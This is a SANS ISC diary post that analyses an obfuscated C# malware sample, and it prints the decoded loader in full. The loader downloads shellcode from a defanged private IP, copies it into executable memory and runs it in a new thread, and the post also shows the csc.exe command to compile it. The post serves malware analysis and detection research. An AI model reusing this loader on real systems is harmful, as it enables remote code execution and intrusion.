I found an interesting CSharp source code on VT a few days ago. Its score is only 3/59 (SHA256:5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a)[1].
It has been a long time since I saw payloads ready to be compiled. I did some research on self-compiling malware in 2020[2]. I think the file was uploaded on VT to verify the detection rate by AV vendors because the CobalStrike server is a private IP address. Or was it in the scope of some Red team exercise?
The code is obfuscated with junk characters that are removed during execution:
string pRVSczAKPboj = “u>(hs>(hi>(hn>(hg>(h
[…payload removed…]
>(h >(h0>(hx>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(hF>(h)>(h;>(h}>(h}>(h}”.Replace(“>(h”, “”);
Here is the decoded payload, which is easy to understand:
using System;
using System.Net;
using System.Runtime.InteropServices;
namespace GnRiolRYuAcH
{
public class EpQmktOhiwXb
{
[DllImport (“kernel32”)] private static extern UInt64 VirtualAlloc (UInt64 zJAjSroWZVkI, UInt64 KaWcaAtEjRML, UInt64 PRZMeuJQylhj, UInt64 lDLVdityOBmY);
[DllImport (“kernel32”)] private static extern IntPtr CreateThread (UInt64 NxVjPRlolSsT, UInt64 EZnBMZtLXzTZ, UInt64 mNXqHtnujBJm, IntPtr BVcXnWWYhroa, UInt64 rckVAtyTWXhW, ref UInt64 OUmSsFQyEEnY);
[DllImport (“kernel32”)] private static extern UInt64 WaitForSingleObject (IntPtr ucXgBIyufbdT, UInt64 nmJKJtodAzHm);
[DllImport (“kernel32.dll)] static extern IntPtr GetConsoleWindow ();
[DllImport (“user32.dll”)] static extern bool ShowWindow (IntPtr holpJgOYqcKG, int viaQwLWOkGFp);
public static void Main ()
{
ShowWindow (GetConsoleWindow (), 0);
WebClient sbTBMGCfElPa = new System.Net.WebClient ();
sbTBMGCfElPa.Headers.Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)”);
sbTBMGCfElPa.Headers.Add (“Accept”, “*/*”);
sbTBMGCfElPa.Headers.Add (“Accept-Language”, “en-gb,en;q=0.5”);
byte[] AjVmuebayNvb = null;
AjVmuebayNvb = sbTBMGCfElPa.DownloadData (“hxxp://192[.]168[.]1[.]28:1234/Qm3k”);
byte[] BlAVsJsniHyM = new byte[AjVmuebayNvb.Length – 0];
Array.Copy (AjVmuebayNvb, 0, BlAVsJsniHyM, 0, BlAVsJsniHyM.Length);
UInt64 gltoUfDFqsfu = VirtualAlloc (0, (UInt64) BlAVsJsniHyM.Length, 0x1000, 0x40);
Marshal.Copy (BlAVsJsniHyM, 0, (IntPtr) (gltoUfDFqsfu), BlAVsJsniHyM.Length);
IntPtr wnvVIenBotAX = IntPtr.Zero;
UInt64 DfVxARfvlcwx = 0;
IntPtr YBKUjHKOUGUq = IntPtr.Zero;
wnvVIenBotAX = CreateThread (0, 0, gltoUfDFqsfu, YBKUjHKOUGUq, 0, ref DfVxARfvlcwx);
WaitForSingleObject (wnvVIenBotAX, 0xFFFFFFFF);
}
}
}
The behavior is classic: Some READ_WRITE_EXECUTE (0x40) memory is allocated, and the payload returned by the HTTP request to the internal IP is injected and started in a new thread.
This can be compiled and executed on any Windows computer with a .Net framework installed (read: 99% of them!)
C:WindowsMicrosoft.NETFrameworkv4.0.30319>csc.exe /t:exe /out:payload.exe c:usersremDesktoppJmOrSymbiAM.cs
Indeed, all of you have a compiler installed on your computers, even if you’re not developers!
Usually, this kind of code is written in Powershell, but this technique looks stealthier. Or maybe not! I uploaded my compiled file to VT, which got a bad score of 36/72[4].
[1] https://www.virustotal.com/gui/file/5aebf1369b9b54cfc340f34fcc61a90872085a2833fd9bcf238f7c62a5c7620a/detection
[2] https://www.sans.org/webcasts/atmic-talk-self-compiling-malware-114085/
[3] https://isc.sans.edu/diary/Finding+Metasploit+Cobalt+Strike+URLs/27204
[4] https://www.virustotal.com/gui/file/2bd26546e09eff4675d020dab3da4fc6cb08bad9637905ac792d16a4a8937bcf/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.